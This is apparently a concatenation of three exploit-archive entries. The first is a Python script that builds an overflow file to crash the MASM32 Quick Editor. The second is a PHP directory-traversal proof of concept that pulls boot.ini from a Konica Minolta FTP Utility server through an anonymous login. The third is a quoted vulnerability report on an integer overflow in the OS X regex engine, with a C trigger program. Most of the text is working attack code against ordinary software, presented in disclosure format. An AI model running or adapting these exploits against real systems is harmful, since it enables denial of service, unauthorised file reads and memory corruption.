# Steps to Crash :-
# Step 1: Execute this python script
# Step 2: This script will create a file called MASM_crash.txt
# Step 3: Now open Masm32's QUICK EDITOR
# Step 4: Go to Script > 'Convert Text to Script'
# Step 5: Open the MASM_crash.txt to convert
# Step 6: That should crash the program .
file = open('MASM_crash.txt' , 'w');
buffer = "A"*4676 + "B"*4 + "C"*4 + "D"*500
file.write(buffer);
file.close()
/*
---------------------------------------------------------------------
Konica Minolta FTP Utility directory traversal vulnerability
Url: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
Poc: http://shinnai.altervista.org/exploits/SH-0024-20150922.html
---------------------------------------------------------------------
*/
<?php
$local_file = 'boot.ini.txt';
$server_file = '..\..\..\..\..\..\..\..\boot.ini';
$conn_id = ftp_connect($ftp_server);
$login_result = ftp_login($conn_id, "anonymous", "anonymous");
if (ftp_get($conn_id, $local_file, $server_file, FTP_BINARY)) {
echo "Successfully written to $local_file\n";
} else {
echo "There was a problem\n";
}
ftp_close($conn_id);
?>
---------------------------------------------------------------------
Source: https://code.google.com/p/google-security-research/issues/detail?id=429
The OS X regex engine function tre_tnfa_run_parallel contains the following code:
int tbytes;
...
if (!match_tags)
num_tags = 0;
else
num_tags = tnfa->num_tags;
...
{
int rbytes, pbytes, total_bytes;
char *tmp_buf;
/* Compute the length of the block we need. */
tbytes = sizeof(*tmp_tags) * num_tags;
rbytes = sizeof(*reach_next) * (tnfa->num_states + 1);
pbytes = sizeof(*reach_pos) * tnfa->num_states;
total_bytes =
(sizeof(long) - 1) * 4 /* for alignment paddings */
+ (rbytes + tbytes * tnfa->num_states) * 2 + tbytes + pbytes;
DPRINT(("tre_tnfa_run_parallel, allocate %d bytes\n", total_bytes));
/* Allocate the memory. */
#ifdef TRE_USE_ALLOCA
buf = alloca(total_bytes);
#else /* !TRE_USE_ALLOCA */
buf = xmalloc((unsigned)total_bytes); <-- malloc is called, not alloca
#endif /* !TRE_USE_ALLOCA */
if (buf == NULL)
return REG_ESPACE;
memset(buf, 0, (size_t)total_bytes);
num_states and num_tags are computed based on the requirements of the regex and it's quite easy to make them each >64k with a relatively small regex. Note that total_bytes is an int and part of its calculation is the product of num_states and num_tags.
The types here are all over the place and there's conversion between int, unsigned's and size_t.
The attached PoC causes total_bytes to become negative leading to total_bytes being sign-extended in the memset call.
Severity medium because I haven't looked for exposed attack surface yet, but this doesn't require any non-standard flags (only REG_EXTENDED which is almost always used.)
Proof of Concept:
//ianbeer
#include <pthread.h>
#include <regex.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define DEFAULT_REG_FLAGS (REG_EXTENDED)
void* go(void* arg){
unsigned int nesting_level = 20;
size_t inner_size = nesting_level*2+10;
char* inner = malloc(inner_size);
memset(inner, '(', nesting_level);
inner[nesting_level] = '\\';
inner[nesting_level+1] = '1';
memset(&inner[nesting_level+2], ')', nesting_level);
inner[nesting_level*2+2] = '\x00';
unsigned int n_captures = 0x1000;
char* regex = malloc(n_captures * inner_size + 100);
strcpy(regex, "f(o)o((b)a(r))");
for (unsigned int i = 0; i < n_captures; i++) {
strcat(regex, inner);
}
strcat(regex, "r\\1o|\\2f|\\3l|\\4");
const char* match_against = "hellothar!";
regex_t re;
int err = regcomp (&re, regex, DEFAULT_REG_FLAGS);
if (err == 0) {
void* something = malloc(100);
regexec (&re, match_against, 1, (regmatch_t*)something, DEFAULT_REG_FLAGS);
}
return NULL;
}
int main (int argc, char const** argv)
{
go(NULL);
return 0;
}